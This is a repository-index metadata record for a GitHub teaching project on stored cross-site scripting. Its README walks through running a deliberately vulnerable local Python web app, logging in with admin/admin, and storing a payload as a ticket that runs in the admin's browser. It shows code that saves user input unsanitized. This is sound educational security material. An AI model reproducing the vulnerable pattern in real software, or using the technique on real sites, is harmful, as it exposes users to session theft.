{"id":20493859,"url":"https://github.com/qeeqbox/stored-cross-site-scripting","last_synced_at":"2026-02-17T10:36:35.622Z","repository":{"id":104219189,"uuid":"486722717","full_name":"qeeqbox/stored-cross-site-scripting","owner":"qeeqbox","description":"A threat actor may inject malicious content into a vulnerable target","archived":false,"fork":false,"pushed_at":"2025-07-28T00:44:10.000Z","size":1304,"stargazers_count":4,"open_issues_count":0,"forks_count":1,"subscribers_count":0,"default_branch":"main","last_synced_at":"2025-10-09T10:06:51.685Z","etag":null,"topics":["cross","example","infosecsimplified","metadata","qeeqbox","scripting","site","stored","visulization","vulnerability","xss-vulnerability"],"latest_commit_sha":null,"homepage":"","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"agpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/qeeqbox.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["qeeqbox"]}},"created_at":"2022-04-28T19:25:42.000Z","updated_at":"2025-07-28T01:03:30.000Z","dependencies_parsed_at":"2025-07-26T23:21:23.735Z","dependency_job_id":null,"html_url":"https://github.com/qeeqbox/stored-cross-site-scripting","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/qeeqbox/stored-cross-site-scripting","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/qeeqbox%2Fstored-cross-site-scripting","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/qeeqbox%2Fstored-cross-site-scripting/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/qeeqbox%2Fstored-cross-site-scripting/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/qeeqbox%2Fstored-cross-site-scripting/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/qeeqbox","download_url":"https://codeload.github.com/qeeqbox/stored-cross-site-scripting/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/qeeqbox%2Fstored-cross-site-scripting/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":29540188,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-02-17T08:11:05.436Z","status":"ssl_error","status_checked_at":"2026-02-17T08:09:38.860Z","response_time":100,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.6:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cross","example","infosecsimplified","metadata","qeeqbox","scripting","site","stored","visulization","vulnerability","xss-vulnerability"],"created_at":"2024-11-15T17:37:10.019Z","updated_at":"2026-02-17T10:36:35.588Z","avatar_url":"https://github.com/qeeqbox.png","language":null,"funding_links":["https://github.com/sponsors/qeeqbox"],"categories":[],"sub_categories":[],"readme":"\u003cp align=\"center\"\u003e \u003cimg src=\"https://raw.githubusercontent.com/qeeqbox/stored-cross-site-scripting/main/content/stored-cross-site-scripting.svg\"\u003e\u003c/p\u003e\n\nAn application enables users to control the Document Object Model (DOM) environment. A threat actor can exploit this feature by injecting a malicious payload into the trusted web application database. When users interact and request resources from the database, their browsers retrieve the payload and then execute it. This vulnerability is reflected in the HTTP(s) response and occurs on the client side. However, the payload is saved on the server-side\n\nClone this current repo recursively\n```sh\ngit clone --recurse-submodules https://github.com/qeeqbox/stored-cross-site-scripting\n```\nRun the webapp using Python\n```sh\npython3 stored-cross-site-scripting/vulnerable-web-app/webapp.py\n```\nOpen the webapp in your browser 127.0.0.1:5142\n\u003cp align=\"center\"\u003e \u003cimg src=\"https://raw.githubusercontent.com/qeeqbox/stored-cross-site-scripting/main/content/1.png\"\u003e\u003c/p\u003e\nUse the default credentials (username: admin and password: admin) to login\n\u003cp align=\"center\"\u003e \u003cimg src=\"https://raw.githubusercontent.com/qeeqbox/stored-cross-site-scripting/main/content/2.png\"\u003e\u003c/p\u003e\nA threat actor could embed a malicious payload instead of a ticket\n\u003cp align=\"center\"\u003e \u003cimg src=\"https://raw.githubusercontent.com/qeeqbox/stored-cross-site-scripting/main/content/3.png\"\u003e\u003c/p\u003e\nWhen the victim logs in (The admin user), the payload will be executed by the broswer \n\u003cp align=\"center\"\u003e \u003cimg src=\"https://raw.githubusercontent.com/qeeqbox/stored-cross-site-scripting/main/content/4.png\"\u003e\u003c/p\u003e\nIf you examine the ticket section, you will see the payload there\n\u003cp align=\"center\"\u003e \u003cimg src=\"https://raw.githubusercontent.com/qeeqbox/stored-cross-site-scripting/main/content/5.png\"\u003e\u003c/p\u003e\n\n## Code\nWhen the user adds a ticket to the webapp, the ticket is sent from the user to the webapp using a POST request, the add route is used, and the data is passed to the add_ticket() function\n```py\ndef do_POST(self):\n    ...\n    elif parsed_url.path == \"/add\":\n        self.add_ticket(post_request_data[\"ticket\"][0])\n        self.redirect(URL)\n    ...\n```\nThe add_ticket() function will embed the user value in an SQLite database\n```py\n@logged_in\n@check_access(access=\"ticket\")\ndef add_ticket(self, ticket):\n    with connect(DATABASE, isolation_level=None) as connection:\n        cursor = connection.cursor()\n        cursor.execute(\"INSERT into ticket(username, ticket) values(?,?)\", (self.session[\"username\"], ticket))\n        return True\n    return False\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fqeeqbox%2Fstored-cross-site-scripting","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fqeeqbox%2Fstored-cross-site-scripting","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fqeeqbox%2Fstored-cross-site-scripting/lists"}